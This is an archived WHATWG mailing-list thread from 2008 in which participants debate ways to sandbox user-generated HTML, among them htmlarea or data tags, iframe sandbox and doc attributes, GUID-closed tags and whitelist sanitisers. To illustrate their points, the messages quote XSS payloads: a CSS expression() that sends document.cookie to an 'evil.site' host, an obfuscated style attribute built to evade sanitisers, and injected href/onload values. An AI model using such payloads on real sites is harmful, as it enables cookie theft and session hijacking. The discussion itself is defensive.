Re: [whatwg] Sandboxing to accommodate user generated content.
On Tue, 17 Jun 2008, Frode Børli wrote: A major challenge for many web developers is validating untrusted content such as the message body of a blog comment. Unless the developer has a flawless and future proof algorithm for ensuring that the message body does not contain any script, web developers have to resort to text only - or bbCode-style markup languages to allow users to post text content with richer formatting. [...] Another problem which makes future proofing this type of security is that standards evolve. A few years ago you could safely allow users to apply css-styles to tags. [...] In general using whitelisting and a real parser and serialiser combination, e.g. what html5lib does now, allows one to have pretty secure and future-proof sanitiser. One solution: htmlareaUser generated content/htmlarea No scripts would ever be allowed to be executed inside this tag. Malicious users could potentially submit /htmlarea unsafe content htmlarea and get around this. There are as I can see it two solutions to this: User generated content inside the tag must be escaped using html entities (but still rendered as html by the user agent), or the author must prevent users from submitting the string /htmlarea and all possible variations of the tag. If the first solution is used, then browsers should display a strong security warning if unescaped content is seen between htmlarea-tags on a website (to educated web developers). HTML5 now has something similar to this: iframe sandbox src=data:text/html;base64,.../iframe ...where ... is the sanitised user-provided content, base64-encoded. On Tue, 17 Jun 2008, Frode Børli wrote: In the discussions I find that backward compatability is absolutely the most important issue. Second is that it must be easy for web developers to use the features. The suggested solution of using an attribute on an iframe element for storing the user generated content has several problems; 1: The use of src= as a fallback means that style information will be lost and stylesheets must be loaded again. The CSS can be embedded in the iframed snippets in the transition period; on the long term, the seamless attribute side-steps this issue. 2: The use of src= yields problems with iframe heights (since the src-url must be hosted on another server javascript cannot fix this) and HTML 4 browsers have no other method of adjusting the iframe height according to the content. The seamless attribute addresses this also, though admittedly there is no good short-term fix for this. 3: If you have a page that lists 60 comments on a blog, then the user agent would have to contact the server 60 times to fetch each comment. With data: URLs, all the comments can be included in the original request. 4: For the fallback method of using src= for HTML 4 browsers to actually work, the fallback documents must be hosted on a separate domain name. This again means that a website using HTTPS must purchase and maintain two certificates. This is a problem with any solution that is intended to work with today's browsers without server-side sanitation, indeed. If we add a new element htmlarea/htmlarea, old browsers will run scripts, while new browsers will stop scripts and this is a major problem. Indeed. If HTML 5 browsers require everything between htmlarea/htmlarea to be html entity escaped, that is and must be replaced with lt; and gt; respectively. If this is not done, HTML 5 browsers will issue a severe warning and refuse to display the page. Developers will quickly learn. How would the browser know when the /htmlarea tag is the actual end tag or just something that the author forgot to escape? HTML 4 browsers will never run scripts (since it will only see plain text). HTML 5 browsers will display rich text. It would be completely secure for both HTML 4 and HTML 5 browsers. A simple Javascript could clean up the HTML markup for HTML 4 browsers.. Wouldn't that reintroduce the security bugs? On Wed, 18 Jun 2008, Frode Børli wrote: I have written a sanitizer for html and it is very difficult - especially since browsers have undocumented bugs in their parsing. Example: div colspan=amp; style=font-family#61;expression#40;alert#40quot;hackedquot#41#41 colspan=amp;Red/div A sanitiser that did what I describe above would not be affected by this (or any other similar problem). Basically, you would have to parse the content using the HTML5 parser rules, and then reserialise the content, dropping any element or attribute or attribute value that is not explicitly whitelisted. It is critical that for every allowed attribute, the value be parsed using the relevant rules (e.g. CSS for style=, as a URL for href=, etc), and then the values therein reserialised in the same manner for that language (e.g. only serialising CSS properties that have whitelisted property values). Yes,
Re: [whatwg] Sandboxing to accommodate user generated content.
Frode Børli wrote: I have been reading up on past discussions on sandboxing content, and My main arguments for having this feature (in one form or another) in the browser is: - It is future proof. Changes to browsers (for example adding expression support to css) will never again require old sanitizers to be updated. Unless some braindead vendor is going to add scripting-in-sandboxing feature which would be equally braindead to unlimited expression support in css. You cannot be future proof unless you trust all the players including ALL possible browser vendors. If the sanitiser uses a whitelist based approach that forbids everything by default, and then only allows known elements and attributes; and in the case of the style attribute, known properties and values that are safe, then that would also be the case. I have written a sanitizer for html and it is very difficult - especially since browsers have undocumented bugs in their parsing. Example: div colspan=amp; style=font-family#61;expression#40;alert#40quot;hackedquot#41#41 colspan=amp;Red/div Every real sanitizer MUST parse the input and generate its internal DOM. If you then generate known good serialization of that DOM there's no way your sanitizer would ever output such code. I, too, have written my own simplified HTML parser that converts all unknown parts to data (that is, escape all the following characters: '). Just parse the input into DOM and only after that check if for safe content. You cannot sanitize HTML using only string replacements without generating a DOM (all of DOM is not needed in the memory at once, it's possible to process the input as a stream and handle one tag at a time and only keep a stack of open tag names in addition). The proof that sanitazing HTML is difficult is the fact that no major site even attempts it. Even wikipedia use some obscure wiki-language, instead of implementing a wysiwyg editor. Wikipedia does sanitize HTML in the content. It does support its own wiki-language in addition to HTML. For example, Try to input the following text as is in the wikipedia sandbox page and press Show preview: *** Example: div colspan=amp; style=font-family#61;expression#40;alert#40quot;hackedquot#41#41 colspan=amp;Red/div Some bmore/b content ihere/i. *** Works just fine. The content is sanitized and unregognized parts are converted to data. Correctly written parts are used as HTML tags. Trust me, it's really not that hard. The hard part is to decide which tags and which attributes and which attribute values do you want to allow. And you have to decide that by yourself - there's no magic silver bullet safe feature set that is suitable for every usage and for every site. If you don't want to go through all this trouble, do not try to allow HTML or any other markup in user generated content unless you *really* trust your users. Note that sandboxing doesn't entirely remove the need for sanitising user generated content on the server, it's just an extra line of defence in case something slips through. Ofcourse. However, the sandbox feature in browser will be fail safe if user generated content is escaped with lt; and gt; before being sent to the browser - as long as the browser does not have bugs of course. That's a pretty big if. If the page author / server application programmer is always able to escape content correctly, how much harder is it to correctly escape and sanitize the content in anyway? All this sounds too much like magic_quotes in PHP... A problem with this approach is that developers might forget to escape tags, therefore I think browsers should display a security warning message if the character or is encountered inside a data tag. If a developer forgot to escape the markup at all, then a user could enter /datascript.../script and do anything they wanted. Yes, that is my point. That is why I want the sandbox to display a severe security warning if the developer has forgotten to escape it. Isn't that a bit too late? If the developer is not testing his application before the release what's the point of breaking the whole site in the user's browser as a result? It will not guard against XSS because the user generated content can be *first* used to end the sandbox and *then* user to insert XSS attack. Browser sees only valid content in the sandbox and site is still under XSS attack. This method will be safe for all browsers that has ever existed and that will ever exist in the future. If new features are introduced in some future version of CSS or HTML - the sandbox is still there and the applications created today does not need to have their sanitizers updated, ever. That's a pretty bold claim! I guess that a similar claim could have been said about CSS support before Microsoft added the expression() value syntax. Can *you* guarantee that a random browser vendor does not implement anything stupid for the sandbox content in the future? -- Mikko
Re: [whatwg] Sandboxing to accommodate user generated content.
Lets sort things out, folks. There is nothing in the spec to prevent a browser vendor to format the users hard drive and to drain her bank account as a bonus when the page displayed contains the string D357R0Y!N0\V!. The spec does not tell the vendors what not to do, therefore it cannot guarantee anything in this respect. The spec provides a reference implementation and it is our job not to let harmful extensions in here; what happens in the wild is beyond our control. IMHO, Chris -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Mikko Rantalainen Sent: Wednesday, June 18, 2008 9:20 AM To: whatwg@lists.whatwg.org Subject: Re: [whatwg] Sandboxing to accommodate user generated content. Frode Børli wrote: I have been reading up on past discussions on sandboxing content, and My main arguments for having this feature (in one form or another) in the browser is: - It is future proof. Changes to browsers (for example adding expression support to css) will never again require old sanitizers to be updated. Unless some braindead vendor is going to add scripting-in-sandboxing feature which would be equally braindead to unlimited expression support in css. You cannot be future proof unless you trust all the players including ALL possible browser vendors. [snip] This method will be safe for all browsers that has ever existed and that will ever exist in the future. If new features are introduced in some future version of CSS or HTML - the sandbox is still there and the applications created today does not need to have their sanitizers updated, ever. That's a pretty bold claim! I guess that a similar claim could have been said about CSS support before Microsoft added the expression() value syntax. Can *you* guarantee that a random browser vendor does not implement anything stupid for the sandbox content in the future? -- Mikko
Re: [whatwg] Sandboxing to accommodate user generated content.
On Tue, 17 Jun 2008 06:09:55 +0200, Frode Børli [EMAIL PROTECTED] wrote: Hi! I am a new member of this mailing list, and I wish to contribute with a couple of specific requirements that I believe should be discussed and perhaps implemented in the final specification. I am unsure if this is the correct place to post my ideas (or if my ideas are even new), but if it is not, then I am sure somebody will instruct me. :) One person told me that the specification was finished and no new features would be added from now on - but hopefully that is not true. That is actually true. However, sandboxing has been proposed in the past and is therefore still considered in scope. (Unless of course we decide it's out of scope, but given the sandboxing features already in the specification, I expect that to be not the case.) One solution: htmlareaUser generated content/htmlarea As you note this solution has significant issues. Besides inserting /htmlarea it would also allow execution of scripts in legacy user agents and is therefore not really backwards compatible. I believe the idea to deal with this is to add another attribute to iframe, besides sandbox= and seamless= we already have for sandboxing. This attribute, doc=, would take a string of markup where you would only need to escape the quotation character used (so either ' or ). The fallback for legacy user agents would be the src= attribute. -- Anne van Kesteren http://annevankesteren.nl/ http://www.opera.com/
Re: [whatwg] Sandboxing to accommodate user generated content.
I have been reading up on past discussions on sandboxing content, and I feel that it is generally agreed on that there should be some mechanism for marking content as user generated. The discussion mainly appears to be focused on implementation. Please read my implementation notes at the end of this message on how we can include this function safely for both HTML 4 and HTML 5 browsers, and still allow HTML 4 browsers to function properly. My main arguments for having this feature (in one form or another) in the browser is: - It is future proof. Changes to browsers (for example adding expression support to css) will never again require old sanitizers to be updated. - It does not require much skill and effort from the web developer to safely sanitize user content. - Security bugs are fixed by browser vendors, and not by each web developer. In the discussions I find that backward compatability is absolutely the most important issue. Second is that it must be easy for web developers to use the features. The suggested solution of using an attribute on an iframe element for storing the user generated content has several problems; 1: The use of src= as a fallback means that style information will be lost and stylesheets must be loaded again. 2: The use of src= yields problems with iframe heights (since the src-url must be hosted on another server javascript cannot fix this) and HTML 4 browsers have no other method of adjusting the iframe height according to the content. 3: If you have a page that lists 60 comments on a blog, then the user agent would have to contact the server 60 times to fetch each comment. This again means that perl/php scripts have to be invoked 60 times for one page view - that is 61 separate database connections and session initializations. 4: For the fallback method of using src= for HTML 4 browsers to actually work, the fallback documents must be hosted on a separate domain name. This again means that a website using HTTPS must purchase and maintain two certificates. I do not believe this solution will ever be used. My solution: If we add a new element htmlarea/htmlarea, old browsers will run scripts, while new browsers will stop scripts and this is a major problem. If HTML 5 browsers require everything between htmlarea/htmlarea to be html entity escaped, that is and must be replaced with lt; and gt; respectively. If this is not done, HTML 5 browsers will issue a severe warning and refuse to display the page. Developers will quickly learn. HTML 4 browsers will never run scripts (since it will only see plain text). HTML 5 browsers will display rich text. It would be completely secure for both HTML 4 and HTML 5 browsers. A simple Javascript could clean up the HTML markup for HTML 4 browsers.. I believe the idea to deal with this is to add another attribute to iframe, besides sandbox= and seamless= we already have for sandboxing. This attribute, doc=, would take a string of markup where you would only need to escape the quotation character used (so either ' or ). The fallback for legacy user agents would be the src= attribute. -- Best regards / Med vennlig hilsen Frode Børli Seria.no Mobile: +47 406 16 637 Company: +47 216 90 000 Fax: +47 216 91 000 Think about the environment. Do not print this e-mail unless you really need to. Tenk miljø. Ikke skriv ut denne e-posten dersom det ikke er nødvendig.
Re: [whatwg] Sandboxing to accommodate user generated content.
1. Please elaborate how an extension of CSS would require a sanitizer update. 2. Please explain why using a dedicated tag with double parsing is easier for a Web developer than putting the code in an attribute. 3. Your quoting solution would not cause legacy browsers to show plain text; they would show HTML code, which is probably much worse than showing plain text. If you mean JavaScript can be used to extract plain text, I doubt it will be simple; there are probably lots of junctions where this procedure can derail. 4. Please explain why you consider network efficiency for legacy user agents essential. I believe that the correlation between efficiency and compatibility is negative in general. If that causes server overload, the server can discriminate content depending on the user agent; this is a temporary solution to an edge case and it should probably be acceptable. Besides, a blog page with 60 comments on it is rather hard to render and read so you should probably consider other display options in this case. 5. I am not sure why IFRAME content must be HTTP-secured if the containing page is. The specification does not impose such a restriction AFAIK. And, if you need to go secure, do not allow scribbling in the first place, right? Please take these points as a challenge, not as an attempt to let you down. I personally think your idea is worth considering. Chris -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Frode Borli Sent: Tuesday, June 17, 2008 3:05 PM To: whatwg@lists.whatwg.org Subject: Re: [whatwg] Sandboxing to accommodate user generated content. I have been reading up on past discussions on sandboxing content, and I feel that it is generally agreed on that there should be some mechanism for marking content as user generated. The discussion mainly appears to be focused on implementation. Please read my implementation notes at the end of this message on how we can include this function safely for both HTML 4 and HTML 5 browsers, and still allow HTML 4 browsers to function properly. My main arguments for having this feature (in one form or another) in the browser is: - It is future proof. Changes to browsers (for example adding expression support to css) will never again require old sanitizers to be updated. - It does not require much skill and effort from the web developer to safely sanitize user content. - Security bugs are fixed by browser vendors, and not by each web developer. In the discussions I find that backward compatability is absolutely the most important issue. Second is that it must be easy for web developers to use the features. The suggested solution of using an attribute on an iframe element for storing the user generated content has several problems; 1: The use of src= as a fallback means that style information will be lost and stylesheets must be loaded again. 2: The use of src= yields problems with iframe heights (since the src-url must be hosted on another server javascript cannot fix this) and HTML 4 browsers have no other method of adjusting the iframe height according to the content. 3: If you have a page that lists 60 comments on a blog, then the user agent would have to contact the server 60 times to fetch each comment. This again means that perl/php scripts have to be invoked 60 times for one page view - that is 61 separate database connections and session initializations. 4: For the fallback method of using src= for HTML 4 browsers to actually work, the fallback documents must be hosted on a separate domain name. This again means that a website using HTTPS must purchase and maintain two certificates. I do not believe this solution will ever be used. My solution: If we add a new element htmlarea/htmlarea, old browsers will run scripts, while new browsers will stop scripts and this is a major problem. If HTML 5 browsers require everything between htmlarea/htmlarea to be html entity escaped, that is and must be replaced with lt; and gt; respectively. If this is not done, HTML 5 browsers will issue a severe warning and refuse to display the page. Developers will quickly learn. HTML 4 browsers will never run scripts (since it will only see plain text). HTML 5 browsers will display rich text. It would be completely secure for both HTML 4 and HTML 5 browsers. A simple Javascript could clean up the HTML markup for HTML 4 browsers.. I believe the idea to deal with this is to add another attribute to iframe, besides sandbox= and seamless= we already have for sandboxing. This attribute, doc=, would take a string of markup where you would only need to escape the quotation character used (so either ' or ). The fallback for legacy user agents would be the src= attribute. -- Best regards / Med vennlig hilsen Frode Borli Seria.no Mobile: +47 406 16 637 Company: +47 216 90 000 Fax: +47 216 91 000 Think about the environment. Do not print this e-mail unless you really need to. Tenk miljo. Ikke skriv ut
Re: [whatwg] Sandboxing to accommodate user generated content.
Hello, I'm new to the list and have joined in response to this discussion on html security changes. I have been reading up on past discussions on sandboxing content, and I feel that it is generally agreed on that there should be some mechanism for marking content as user generated. The discussion mainly appears to be focused on implementation. Please read my implementation notes at the end of this message on how we can include this function safely for both HTML 4 and HTML 5 browsers, and still allow HTML 4 browsers to function properly. In the discussions I find that backward compatability is absolutely the most important issue. Second is that it must be easy for web developers to use the features. The suggested solution of using an attribute on an iframe element for storing the user generated content has several problems; 1: The use of src= as a fallback means that style information will be lost and stylesheets must be loaded again. 2: The use of src= yields problems with iframe heights (since the src-url must be hosted on another server javascript cannot fix this) and HTML 4 browsers have no other method of adjusting the iframe height according to the content. My solution: If we add a new element htmlarea/htmlarea, old browsers will run scripts, while new browsers will stop scripts and this is a major problem. If HTML 5 browsers require everything between htmlarea/htmlarea to be html entity escaped, that is and must be replaced with lt; and gt; respectively. If this is not done, HTML 5 browsers will issue a severe warning and refuse to display the page. Developers will quickly learn. HTML 4 browsers will never run scripts (since it will only see plain text). HTML 5 browsers will display rich text. It would be completely secure for both HTML 4 and HTML 5 browsers. A simple Javascript could clean up the HTML markup for HTML 4 browsers.. I've also been having side discussions with a few people regarding the ability for a website owner to mark sections as data rather than code (where everything lies now). Your htmlarea tag idea is a good one (maybe change the tag to data just a nitpick) however you don't address the use case of the following data user supplied input /data If the user injects /data then game over. A solution I discovered for this problem (others I'm sure as well that aren't speaking) borrows from the defenses of cross-site request forgery (CSRF) where a non guessable token is used. Take the following example data id=GUID /data /data id=GUID GUID would be a temporary GUID value such as 'F9968C5E-CEB2-4faa-B6BF-329BF39FA1E4' that would be tied to the user session. An attacker would be unable to break out of a data tag due to the fact that they couldn't guess the closing ID value. This is something that could be built into a web framework (JSP tag/PHP function/asp.net component) that could handle the token generation portion to assist with adoption. A few notes on this approach - data (or htmlarea whatever you call it) can not be nested. - All content inside data tags would need to be treated as text or handled as HTML entity encoded values before processing I believe the idea to deal with this is to add another attribute to iframe, besides sandbox= and seamless= we already have for sandboxing. This attribute, doc=, would take a string of markup where you would only need to escape the quotation character used (so either ' or ). The fallback for legacy user agents would be the src= attribute. To take this a step further there may be situations where user content is reflected inside of HTML tags in the following manner such as 'a href=user generated valuefoo/a'. For situations like this an additional attribute (along the lines of what you propose) could be added to this tag (or any tag for that matter) to instruct the browser that no script/html can execute. a sandbox=true href=javascript:alert(document.cookie)asd/a a sandbox=true href=injected valueasd/a (injected value onload=javascript:alert('wooot') foo=bar) In this example the developer would allow user content to be inserted into the href value as desired, however disallow script injection as well as breaking out of the html attribute by the specification of this tag (i.e. everything inside each attribute is treated as HTML entity data/text). My 0.04. Regards, - Robert Auger http://www.webappsec.org/
Re: [whatwg] Sandboxing to accommodate user generated content.
I've also been having side discussions with a few people regarding the ability for a website owner to mark sections as data rather than code (where everything lies now). Your htmlarea tag idea is a good one (maybe change the tag to data just a nitpick) however you don't address the use case of the following data user supplied input /data I have considered your idea (below) but found that it would not allow efficient server side caching, which often is needed. If instead all html inside data/data must be escaped like this: data lt;user supplied inputgt; /data Then this will be secure both for HTML 4 and HTML 5 browsers. HTML 4 browsers will display html, while HTML 5 browsers will display correctly formatted code. A simple javascript like this (untested) would make the data tags readable for HTML 4 browsers: var els = document.getElementsByTagName(DATA); for(e in els) els[e].innerHTML = els[e].innerHTML.replace(/#91;^#93;*/g, ).replace(/\n/g, br); A problem with this approach is that developers might forget to escape tags, therefore I think browsers should display a security warning message if the character or is encountered inside a data tag. If the user injects /data then game over. A solution I discovered for this problem (others I'm sure as well that aren't speaking) borrows from the defenses of cross-site request forgery (CSRF) where a non guessable token is used. Take the following example data id=GUID /data /data id=GUID GUID would be a temporary GUID value such as 'F9968C5E-CEB2-4faa-B6BF-329BF39FA1E4' that would be tied to the user session. An attacker would be unable to break out of a data tag due to the fact that they couldn't guess the closing ID value. This is *snip* I believe the idea to deal with this is to add another attribute to iframe, besides sandbox= and seamless= we already have for sandboxing. This attribute, doc=, would take a string of markup where you would only need to escape the quotation character used (so either ' or ). The fallback for legacy user agents would be the src= attribute. To take this a step further there may be situations where user content is reflected inside of HTML tags in the following manner such as 'a href=user generated valuefoo/a'. For situations like this an additional attribute (along the lines of what you propose) could be added to this tag (or any tag for that matter) to instruct the browser that no script/html can execute. a sandbox=true href=javascript:alert(document.cookie)asd/a a sandbox=true href=injected valueasd/a (injected value onload=javascript:alert('wooot') foo=bar) I like this better than a separate tag yes. div sandbox=1/div or div content=untrusted/div
Re: [whatwg] Sandboxing to accommodate user generated content.
1. Please elaborate how an extension of CSS would require a sanitizer update. In the year 1998: A sanitizer algorithm works perfectly for all existing methods of adding scripts. It uses a white list, which allows only certain tags and attributes. Among the allowed attributes is colspan, rowspan and style - since the web developer wants users to be able to build tables and style them properly. In the year 1999 Internet Explorer 5.0 is introduced, and it introduces a new invention; CSS-expressions. Suddenly the formerly secure webapplication is no longer secure. A user adds the following code, and it passes the sanitizer easily: span style='color: blue; width: expression(document.write(img src=http://evil.site/+document.cookie));'/span I am absolutely certain that there will be other, brilliant inventions in the future which will break sanitizers - ofcourse we can't know which inventions today - but the sandboxing means that browser vendors in the future can prevent the above scenario. 2. Please explain why using a dedicated tag with double parsing is easier for a Web developer than putting the code in an attribute. 1. The code will still work in Dreamwaver and similar tools. 2. It is not a totally new way of doing things (we already escape content that are put into textarea in the exact same way as I suggest we put content into the sandbox). Putting a 100 KB piece of user submitted content into an attribute will feel weird - and perhaps even break current parsers. 3. Web developers do not have to create seperate scripts to cater for HTML 4 browser (so that the iframe src= fallback will work). 4. Web developers do not have to create two separate websites (on different domains) that use the same database to make sure that cross site scripting can't happen from the iframe to the parent document. If the web developer simply place a separate script on the same host - then the fallback will have no security at all. 5. The fallback requires the web developer to know the visible size of the content in advance. HTML 4 browsers do not support any methods of resizing the iframe according to the content, when the content of the iframe is from a different domain. 3. Your quoting solution would not cause legacy browsers to show plain text; they would show HTML code, which is probably much worse than showing plain text. If you mean JavaScript can be used to extract plain text, I doubt it will be simple; there are probably lots of junctions where this procedure can derail. I am pretty sure that including a small script similar to this into the main document will make the content very readable, although plain text: script var els = document.getElementsByTagName(DATA); for(e in els) els[e].innerHTML = els[e].innerHTML.replace(/#91;^#93;*/g, ).replace(/\n/g,br); /script I can guarantee you that a few hours work I have a very good script that does this very well. 4. Please explain why you consider network efficiency for legacy user agents essential. I believe that the correlation between efficiency and compatibility is negative in general. It is not the network efficiency for the user agens I am worried about - it is the server side of things that will be the problem. If the server has to do handle 20 separate dynamic requests just to display a single page view then that is unacceptable - and the method will never be used by bigger websites simply because it is not scalable. In fact, it would have already been done if it was a viable option. Please consider my answer to your question number two as well. If that causes server overload, the server can discriminate content depending on the user agent; this is a temporary solution to an edge case and it should probably be acceptable. That is unacceptable. Major websites must accommodate at least 98 % of its user base at any time, and to promote user agent checking on the server side is a major issue for me, and most likely for most other web developers that work on a per project basis. It would require me to review already launched sites regularly and is hardly efficient use of my labour. Besides, a blog page with 60 comments on it is rather hard to render and read so you should probably consider other display options in this case. I am extremely against making assumptions such as a blog page with 60 comments on is rather hard to read so it will never be a problem. I prefer scrolling before clicking next page any time. If there is a choice to display 100 comments instead of 10 then I select 100 comments. Also user generated content might be single line comments, or even just a list of single words. 5. I am not sure why IFRAME content must be HTTP-secured if the containing page is. The specification does not impose such a restriction AFAIK. And, if you need to go secure, do not allow scribbling in the first place, right? 1. An insecure iframe in a secure document will give you security warnings from the browser (There are insecure
Re: [whatwg] Sandboxing to accommodate user generated content.
Frode Børli wrote: I have been reading up on past discussions on sandboxing content, and I feel that it is generally agreed on that there should be some mechanism for marking content as user generated. The discussion mainly appears to be focused on implementation. Please read my implementation notes at the end of this message on how we can include this function safely for both HTML 4 and HTML 5 browsers, and still allow HTML 4 browsers to function properly. My main arguments for having this feature (in one form or another) in the browser is: - It is future proof. Changes to browsers (for example adding expression support to css) will never again require old sanitizers to be updated. If the sanitiser uses a whitelist based approach that forbids everything by default, and then only allows known elements and attributes; and in the case of the style attribute, known properties and values that are safe, then that would also be the case. - It does not require much skill and effort from the web developer to safely sanitize user content. - Security bugs are fixed by browser vendors, and not by each web developer. Note that sandboxing doesn't entirely remove the need for sanitising user generated content on the server, it's just an extra line of defence in case something slips through. The suggested solution of using an attribute on an iframe element for storing the user generated content has several problems; 1: The use of src= as a fallback means that style information will be lost and stylesheets must be loaded again. This is not a major problem. If it uses the same stylesheet, which can be cached by the browser, then at worst it results in a 304 Not Modified response. 2: The use of src= yields problems with iframe heights (since the src-url must be hosted on another server javascript cannot fix this) and HTML 4 browsers have no other method of adjusting the iframe height according to the content. In recent browsers that support cross-document messaging (Opera 9, Safari 3, Firefox 3 and IE 8), you could include a script within the comment page that calculates its own height and sends a message to the parent page with the info. In older browsers, just set the height to a reasonable minimum and let the user scroll. Sure, it's not perfect, but it's called graceul degradation. 3: If you have a page that lists 60 comments on a blog, then the user agent would have to contact the server 60 times to fetch each comment. This again means that perl/php scripts have to be invoked 60 times for one page view - that is 61 separate database connections and session initializations. You could always concatenate all of the comments into a single file, reducing it down to 1 request. 4: For the fallback method of using src= for HTML 4 browsers to actually work, the fallback documents must be hosted on a separate domain name. This again means that a website using HTTPS must purchase and maintain two certificates. I don't see that as a show stopper. My solution: If we add a new element htmlarea/htmlarea, old browsers will run scripts, while new browsers will stop scripts and this is a major problem. If HTML 5 browsers require everything between htmlarea/htmlarea to be html entity escaped, that is and must be replaced with lt; and gt; respectively. If this is not done, HTML 5 browsers will issue a severe warning and refuse to display the page. Developers will quickly learn. Draconian error handling is something we really want to avoid, particularly when the such an error can be triggered by failing to handle user generated content properly. HTML 4 browsers will never run scripts (since it will only see plain text). HTML 5 browsers will display rich text. It would be completely secure for both HTML 4 and HTML 5 browsers. A simple Javascript could clean up the HTML markup for HTML 4 browsers.. In a separate mail, you wrote: data lt;user supplied inputgt; /data Then this will be secure both for HTML 4 and HTML 5 browsers. HTML 4 browsers will display html, while HTML 5 browsers will display correctly formatted code. A simple javascript like this (untested) would make the data tags readable for HTML 4 browsers: var els = document.getElementsByTagName(DATA); for(e in els) els[e].innerHTML = els[e].innerHTML.replace(/#91;^#93;*/g, ).replace(/\n/g, br); At first, I had no idea what that script was trying to do. But AFAICT, you were trying to use this regex: /[^]*/g, which would theoretically match foo. But, in this context, even with the corrected regex, the script is entirely useless. It wouldn't work, for example, with foo bar= baz=xxx. But also because the inner HTML that you're running the regex on is supposed to have all and escaped, and so nothing would be matched anyway. A problem with this approach is that developers might forget to escape tags, therefore I think browsers should display a security warning message if the character or is encountered
Re: [whatwg] Sandboxing to accommodate user generated content.
This particular explanation is irrelevant to the topic because sandboxed fragments can contain scripts, whether within CSS or not. The idea of sandboxing is to disable scripts, not to purge them. Chris -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Frode Borli Sent: Tuesday, June 17, 2008 8:34 PM To: Kristof Zelechovski Cc: whatwg@lists.whatwg.org Subject: Re: [whatwg] Sandboxing to accommodate user generated content. 1. Please elaborate how an extension of CSS would require a sanitizer update. In the year 1998: A sanitizer algorithm works perfectly for all existing methods of adding scripts. It uses a white list, which allows only certain tags and attributes. Among the allowed attributes is colspan, rowspan and style - since the web developer wants users to be able to build tables and style them properly. In the year 1999 Internet Explorer 5.0 is introduced, and it introduces a new invention; CSS-expressions. Suddenly the formerly secure webapplication is no longer secure. A user adds the following code, and it passes the sanitizer easily: span style='color: blue; width: expression(document.write(img src=http://evil.site/+document.cookie));'/span I am absolutely certain that there will be other, brilliant inventions in the future which will break sanitizers - ofcourse we can't know which inventions today - but the sandboxing means that browser vendors in the future can prevent the above scenario.
Re: [whatwg] Sandboxing to accommodate user generated content.
I have been reading up on past discussions on sandboxing content, and I feel that it is generally agreed on that there should be some mechanism for marking content as user generated. The discussion mainly appears to be focused on implementation. Please read my implementation notes at the end of this message on how we can include this function safely for both HTML 4 and HTML 5 browsers, and still allow HTML 4 browsers to function properly. My main arguments for having this feature (in one form or another) in the browser is: - It is future proof. Changes to browsers (for example adding expression support to css) will never again require old sanitizers to be updated. If the sanitiser uses a whitelist based approach that forbids everything by default, and then only allows known elements and attributes; and in the case of the style attribute, known properties and values that are safe, then that would also be the case. I have written a sanitizer for html and it is very difficult - especially since browsers have undocumented bugs in their parsing. Example: div colspan=amp; style=font-family#61;expression#40;alert#40quot;hackedquot#41#41 colspan=amp;Red/div The proof that sanitazing HTML is difficult is the fact that no major site even attempts it. Even wikipedia use some obscure wiki-language, instead of implementing a wysiwyg editor. Note that sandboxing doesn't entirely remove the need for sanitising user generated content on the server, it's just an extra line of defence in case something slips through. Ofcourse. However, the sandbox feature in browser will be fail safe if user generated content is escaped with lt; and gt; before being sent to the browser - as long as the browser does not have bugs of course. The suggested solution of using an attribute on an iframe element for storing the user generated content has several problems; 1: The use of src= as a fallback means that style information will be lost and stylesheets must be loaded again. This is not a major problem. If it uses the same stylesheet, which can be cached by the browser, then at worst it results in a 304 Not Modified response. Many small rivers... 2: The use of src= yields problems with iframe heights (since the src-url must be hosted on another server javascript cannot fix this) and HTML 4 browsers have no other method of adjusting the iframe height according to the content. In recent browsers that support cross-document messaging (Opera 9, Safari 3, Firefox 3 and IE 8), you could include a script within the comment page that calculates its own height and sends a message to the parent page with the info. In older browsers, just set the height to a reasonable minimum and let the user scroll. Sure, it's not perfect, but it's called graceul degradation. Much more difficult to implement than a sandbox/sandbox mechanism - and I do not see the point giving more work to web developers when it could be fixed so easily. 3: If you have a page that lists 60 comments on a blog, then the user agent would have to contact the server 60 times to fetch each comment. This again means that perl/php scripts have to be invoked 60 times for one page view - that is 61 separate database connections and session initializations. You could always concatenate all of the comments into a single file, reducing it down to 1 request. No you could not, if you for example want people to report comments or give them votes - which in the Web 2.0 world requires scripting. 4: For the fallback method of using src= for HTML 4 browsers to actually work, the fallback documents must be hosted on a separate domain name. This again means that a website using HTTPS must purchase and maintain two certificates. I don't see that as a show stopper. Well, I am not going to argue anymore. I have not heard anybody talk in favour of a sandbox mechanism here or contributing something constructive. Only feedback has been that you could do it with iframes, and if it looks ugly with HTML 4 browsers, then that is only graceful degradation, so it is okay. Maybe the future is Flash and Silverlight afterall. We'll see. If HTML 5 browsers require everything between htmlarea/htmlarea to be html entity escaped, that is and must be replaced with lt; and gt; respectively. If this is not done, HTML 5 browsers will issue a severe warning and refuse to display the page. Developers will quickly learn. Draconian error handling is something we really want to avoid, particularly when the such an error can be triggered by failing to handle user generated content properly. I see that argument. Maybe you have a suggestion to what should happen if unescaped HTML is encountered then? HTML 4 browsers will never run scripts (since it will only see plain text). HTML 5 browsers will display rich text. It would be completely secure for both HTML 4 and HTML 5 browsers. A simple Javascript could clean up the HTML markup for HTML 4
Re: [whatwg] Sandboxing to accommodate user generated content.
The problem with tag warning is, if /data is the first token inserted, there will be no warning because the resulting code will be valid. So the key question remains: how do you tell unescaped /data from the closing /data? And the warning, if applicable, will go to the wrong person: to all readers instead of just one writer. What is invalid about img alt= src=next.png? It is not enough to scratch some JavaScript that will look all right and correctly sift out plain text for some test cases; you would have to prove that it does the right thing in all cases. Contrary to what you say, MediaWiki sanitizes HTML. You can contribute to Wikipedia without using their templates; the templates are there just to make contributing easier. It should be possible to keep all contributed content in one file with units identified as document fragments. You still have one request per one unit but all of them request the same data file. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Frode Borli Sent: Wednesday, June 18, 2008 12:12 AM To: Lachlan Hunt Cc: whatwg@lists.whatwg.org Subject: Re: [whatwg] Sandboxing to accommodate user generated content. I have been reading up on past discussions on sandboxing content, and I feel that it is generally agreed on that there should be some mechanism for marking content as user generated. The discussion mainly appears to be focused on implementation. Please read my implementation notes at the end of this message on how we can include this function safely for both HTML 4 and HTML 5 browsers, and still allow HTML 4 browsers to function properly. My main arguments for having this feature (in one form or another) in the browser is: - It is future proof. Changes to browsers (for example adding expression support to css) will never again require old sanitizers to be updated. If the sanitiser uses a whitelist based approach that forbids everything by 